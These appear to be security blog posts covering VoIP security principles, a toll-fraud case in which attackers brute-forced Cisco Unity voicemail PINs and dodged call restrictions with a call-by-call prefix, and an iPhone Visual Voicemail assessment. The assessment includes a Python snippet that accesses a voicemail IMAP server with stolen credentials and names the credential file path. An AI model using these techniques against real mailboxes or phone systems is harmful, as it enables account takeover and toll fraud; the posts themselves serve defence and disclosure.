In the VoIP world (as this one is very much about “assets in transit”) it's (nowadays) a quite common one, even though a number of environments still refrain from using it, mainly due to the mentioned “operational price tag”.

Entity Protection (“take care of the security exposure of the individual elements within the environment containing the assets to be protected”)

This encompasses all measures intended to increase the security of individual elements. It’s not limited to simple hardening though, but includes all other “security [posture] quality assurance” things like pentesting or code reviews (when the element looked at is an application).

Adding a comment again I’d like to state that, in times of virtualization and vaporizing security layers (deploying shiny apps pretty much directly connecting customers to your ERP systems, by means of fancy webservices) this one might become more and more important. In the past many security architectures relied on layers of isolation & restriction and thereby skipped the hardening/quality assurance step (“we don’t have to harden this Solaris box as there’s a firewall in front of it”). As the talks’ case studies will show this one is a fundamental (and overlooked) one in many VoIP deployments.

Secure Management (“manage the [infrastructure] elements in a secure way”)

Secure management usually can be broken down to:

  • Restrict the endpoints allowed to establish management connections.
  • Either use a trusted environment (network link) or use secure variants of mgmt. protocols instead of their less secure counterparts (SSH vs. Telnet, HTTPS vs. HTTP, SNMPv3 vs. community-based SNMP and the like).
  • Require sufficient authentication (as for methods, authenticator [e.g. password] quality, personalized accounts etc.).
  • Log security related events and potentially all management actions performed.

 

While this is (or should be) an obvious security principle, daily assessment experience shows that failures/weaknesses in this space account for the majority of critical vulnerabilities when it comes to infrastructure security. This applies in particular to VoIP implementations (see the case studies for examples).

Visibility (“be able to assess the current security posture of your infrastructure and its elements with reasonable effort”)

This is where logging (+ analysis), monitoring etc. come into play. We’d like to note that while this is a valid infrastructure security principle, its actual security benefit is often overestimated given the “detection/reaction” nature of this principle and its subsequent bad operational feasibility.

This is a particularly interesting (and neglected) one in many VoIP environments. Usually the data generated in this space (for VoIP) can not be easily processed (by the $SIEM you acquired two years ago for a six-figure € number and which still has only a handful of use cases defined), while on the other hand being heavily useful (or even required for legal follow-up) in one of those numerous billing fraud incidents.

How to Apply those Principles in a Generic Way

As the above application to VoIP shows, these fundamental security principles allow for tackling any type of “securing assets within a complex overall setting” by going through a simple (checklist-type) set of questions derived from them. These questions could look like

  • Can we limit who’s taking part in some network, protocol, technology, communication act?
  • Any need to isolate stuff due to different protection need, (threat) exposure or trust(worthiness)?
  • What can be done, filtering-wise, on intersection points?
  • Where to apply encryption in an operationally reasonable way?
  • What about the security of the overall system’s main elements?
  • How to manage the infrastructure elements in a secure way?
  • How to provide visibility as for security-related stuff, with reasonable effort?

In a sequel to this post I might cover the mentioned case studies in more detail. In case I miss doing so, the slides will be available after the respective events ;-).
Have a great Sunday,
Enno


[1] As it requires the usually most scarce resource of an organization, that is humans and their brains. The part that can not be easily substituted by technology



[1] In general preventative controls have a better cost/benefit ratio than detective or reactive ones. And this is still true in the “you’ll get owned anyway that’s why you should spend lots of resources on detective/reactive controls” marketing hype age


[2] To provide another example from the routing protocol space: the “inter-operator trust and TCP-” based nature of BGP (as opposed to the “multicast and UDP-“based nature of other routing protocols) certainly is one of the most fundamental stability contributing properties of the current Internet.

[3] Another simple example here. If the two VoIP gateways in the incident described here had used a host route for each other instead of their default route (which wasn’t needed given their only function was to talk to each other), presumably the whole thing wouldn’t have happened.

 

Continue reading
Misc

Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices

On Friday we released our latest technical newsletter with the fancy title “Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices”. It is the result of a field study on decommissioned mobile business devices bought on eBay and about how stored data may be extracted in different ways.

As always we love to share plenty of practical advice: at the end of the newsletter you will find the mitigating controls to securely handle mobile devices at the end of their life cycle.

Find the newsletter here.
And a digitally signed version here.

Special thanks go to Sergej Schmidt for performing the field study.

Talking about our great team: Meet the whole ERNW crew at TROOPERS12, or even better: Dig deeper into mobile security together with Rene Graf during the mobile security workshop. There are a few slots left.

Enjoy the newsletter & hopefully see you soon in Heidelberg!
Florian

Continue reading
Breaking

Groundhog Day: Don't Pay Money for Someone Else's Calls, Still

Hi everyone,
it’s me again with another story of a toll fraud incident at one of our customers (not the same as the last time of course ;-)).
The story began basically like the last one: we received a call with an urgent request to help investigate a toll fraud issue. Like last time, I visited the site in order to get an idea of what exactly was going on. The customer has a VoIP deployment consisting of the whole UC suite Cisco offers: Call Manager, Unity Connection for the voice mailboxes, Cisco based voice gateways and of course IP phones.

During the initial meeting I was told that the incident had taken place over the weekend and had caused a bill of almost 100,000 € in this time period. Similar to the other incident described two weeks ago, our customer didn't discover it himself; again the telco contacted him because of the high bill. After the meeting I got ready to work my way through a whole bunch of log and configuration files to analyze the situation. Spending 1 ½ days on the customer site, I was able to reconstruct the incident. As stated earlier, the customer uses Cisco Unity Connection as the voice mail application. Unity is reachable via a specific telephone number so that employees are able to listen to their voice mail messages while they are on the road. When dialing this number, one has to enter the internal extension followed by a PIN for authentication. It turned out that someone had brute forced the PIN of one of the mailboxes.

So how could this toll fraud issue happen just by brute forcing the PIN of a mailbox? After successful authentication through the PIN, one is also able to configure a transfer of incoming calls to a telephone number of one's choice. Now it should become clear where this is going…

After the bad guys had retrieved the valid PIN, they configured a call transfer to some $EXPENSIVE_LONG_DISTANCE_CALL. In addition they changed the PIN in order to access the system whenever needed. As the issue started on a Friday evening (when almost everybody had already left for the weekend), nobody noticed the compromise of the mailbox. The bad guys logged in about 200 times during the weekend and configured different numbers to which the calls should be transferred. They started with some numbers located in African countries, which wasn't successful because the configuration of the Call Manager blocked outgoing calls to such suspicious countries.

So how could they initiate the calls nevertheless? These guys were smart: after realizing that the first approach wasn't working, they found a clever way to circumvent the restriction. They simply used a so-called “call-by-call” provider. To use such a provider you have to prepend a provider specific prefix to the number, e.g. one prefix of a German provider is 010049. So they dialed 010049+$EXPENSIVE_LONG_DISTANCE_NUMBER and were able to circumvent the restriction on the Cisco Call Manager.

The first question which came to my mind was: why can Cisco Unity initiate outbound calls at all? Well, according to our customer, there was a requirement that Unity should notify some home workers on their regular phone when new messages are present. In order to stop the potential exploit on short notice, we first configured the Call Manager to deny Unity initiating outbound calls. After digging into the configuration of Unity Connection and the Call Manager, I found some settings on the Unity Connection box which gave the attacker an easy game:

  1. The PIN was only 4 digits long.
  2. Unity Connection did not prevent the use of trivial PINs like „0000“ or „1234“.
  3. There was no restriction on which numbers a call transfer could be configured to.
  4. The ability to configure a call transfer over the Phone Interface is at least debatable.

These properties are a little unfortunate, as Unity Connection gives you all the tools you need to address the issues mentioned above. However, in this scenario the configuration had not been handled appropriately. So this case basically boils down to configuration weaknesses which made it easy for the attacker to exploit the issue. Like in the last incident, the initial deployment and configuration had been done by an external service provider.

So how can we assure that this won’t happen again?

  1. Use longer PINs. I recommended that the PIN should be at least 6 digits, which increases the number range an attacker has to brute force significantly (10^6 = 1,000,000 possible PINs instead of 10^4 = 10,000), so the attack takes up to 100 times as long! The password policy for the mailbox is configured in a so-called authentication rule, where one can define all sorts of settings for the mailbox password. In this authentication rule it was just one click to disable the use of trivial PINs.
  2. In Unity Connection one can configure so-called restriction tables to define to which numbers a call can be transferred. In the default installation there are some predefined restrictions, which however didn't match the number plan of this particular customer.
  3. I recommended evaluating the need for configuring call transfers over the phone, along with the advice to disable this functionality if it is not needed.

All in all it is not rocket science to configure Unity Connection in a secure way, which unfortunately doesn't mean you won't find all kinds of scary misconfigurations; all the years at ERNW have shown me this impressively.

As already said: it can cost you quite a lot of money if you do not take precautions to prevent this kind of incident in the first place. So if you own the mentioned products (or plan on integrating them into your environment), check the configuration to ensure something like this won't happen to you 😉

And one more thing: if you are interested in more VoIP security coverage, don't miss Troopers 2012, where Enno and Daniel will give a talk on how to compromise the Cisco VoIP Crypto Ecosystem.

Have a great day,
Chris

 

Continue reading
Breaking

Assessment of Visual Voicemail on iPhones

VVM on iOS 5.0.1

Visual Voicemail (VVM) is a common feature of phone providers which allows accessing the good old voice mailbox through the phone's visual interface. In contrast to the classical voicemail approach, VVM allows intuitive navigation through voice messages without dealing with an automated voice telling you about the message count and possible options. However, this implies the need of actually loading the messages of missed calls onto the phone. The VVM app displays missed calls and downloads the corresponding messages which have been left by the caller. The software comes with your iPhone and is not intended for uninstallation; however, providers have to support it and have to activate it for supporting clients. This feature has been available on iPhones since August 2009 and became available on BlackBerrys and a few Nokia phones later. Android doesn't implement VVM in general; however, some telecommunication providers offer their own apps to add this feature. Since version 4.0, Android offers an official Voicemail Provider API enabling better integration into the mobile OS.

Lately we had a deeper look at a VVM client. The client is integrated (on iPhones) into the phone app but has to be activated by the provider (and a special backend is needed). We assume this is handled through a stealth SMS or the like, since related network traffic is not visible. Also, most providers charge you for this feature; some contracts include VVM, but typically it has to be activated initially. Even if a connection to a wireless LAN exists, the traffic between the phone and the VVM backend is routed through the 3G interface and doesn't pass over the Wi-Fi connection. This is interesting, since normally the Wi-Fi connection would be preferred. This allows the providers to limit backend access to their own „IPs used on the 3G networks“, meaning only customers with a SIM card from the corresponding provider can access the mailbox system. From a corporate point of view this also means that a phone connected to a wireless LAN with an active VPN connection would certainly bypass its „default way to the Internet“ and consequently also bypass potentially present security controls like proxy servers.

After actual VVM usage, we jailbroke the phone and installed assessment tools. In addition we installed Cydia (a third party app store), an SSH daemon (to connect remotely) and tcpdump (to sniff network traffic). Cydia makes use of the package management known from Debian GNU/Linux, so we used “dpkg -i” to install the local package (.deb) of KeychainViewer, which was not available through the repository.

By sniffing the network traffic it was possible to examine the IMAP protocol, revealing the username and the corresponding hashed password (which allows repeating a successful login) and of course all voicemail files. We want to highlight that all the voicemail files were transferred unencrypted. In addition we had a look at the keychain entries of the app. This revealed information (used protocol, port and server IP) already known from sniffing the network traffic, plus some new details. The first thing we noticed was the format of the account name (as already seen in the network traffic) as well as the password, which is stored in cleartext. Together with the server IP address, this already equals the critical set of sensitive information that becomes available through sniffing the network traffic. As the IMAP protocol on port 143 is used for communication, we were able to test the retrieved connection data and credentials using a standard email client. Unsurprisingly it worked out well. The screenshots show how we used Thunderbird to read the folder structure of the mailbox itself. Voice calls are basically implemented as emails with an .amr audio file attached.

Mailbox with Thunderbird
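
Of course this doesn't even require a mail client. Once username, password and server IP are known (the values below are placeholders), a few lines of Python are enough to list the stored voicemails:

import imaplib

HOST, USER, PASSWORD = "198.51.100.10", "+491701234567", "secret"   # placeholders

conn = imaplib.IMAP4(HOST, 143)          # plain IMAP, no TLS -- exactly what we saw on the wire
conn.login(USER, PASSWORD)
conn.select("INBOX")
status, ids = conn.search(None, "ALL")   # every listed message corresponds to one voicemail
print(ids)                               # the .amr audio files are attached to these messages
conn.logout()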

In addition we found that, after activation of the VVM feature, the configuration (.plist) file is stored at /var/mobile/Library/Voicemail/com.apple.voicemail.imap.parameters.plist, containing the username, protocol information, the state of the voicemail account and the server IP. Having the username and the server IP, which depends on the provider but can typically be figured out very easily, an attacker can run brute force attacks against the email server which is exposed to the Internet.
Furthermore the whole data transfer turned out to be unencrypted. One could argue that sniffing 2G/3G isn’t that easy when compared with sniffing Wi-Fi traffic. But even though eavesdropping or MITM attacks are not as likely as on Wi-Fi networks, they shouldn’t be completely ignored. Unfortunately login credentials tend to be long-living data. Once intercepted, these data will give an attacker the opportunity to access mailboxes and corresponding applications for a long time.

Providers still seem to rely on the non-interceptable properties of their networks. Even though intercepting isn't easy, several publications have proven them wrong in the last years, so this threat model is at least questionable. In addition, scenarios exist in which traffic is routed through untrusted areas, e.g. in case of roaming. Considering the increasing importance of TCP/IP, traffic will more and more pass untrusted areas. Furthermore, the trust model does not seem to consider the actual user as a threat to sensitive data stored on the device (such as credentials for the VVM server). Last but not least, finding sensitive information such as login credentials unencrypted/unhashed still comes with a sobering taste.
All this has to be kept in mind when using such technologies and may lead to the question whether the provider's trust/threat model matches your own or that of your environment/company.

Have a nice day,
Sergej

Continue reading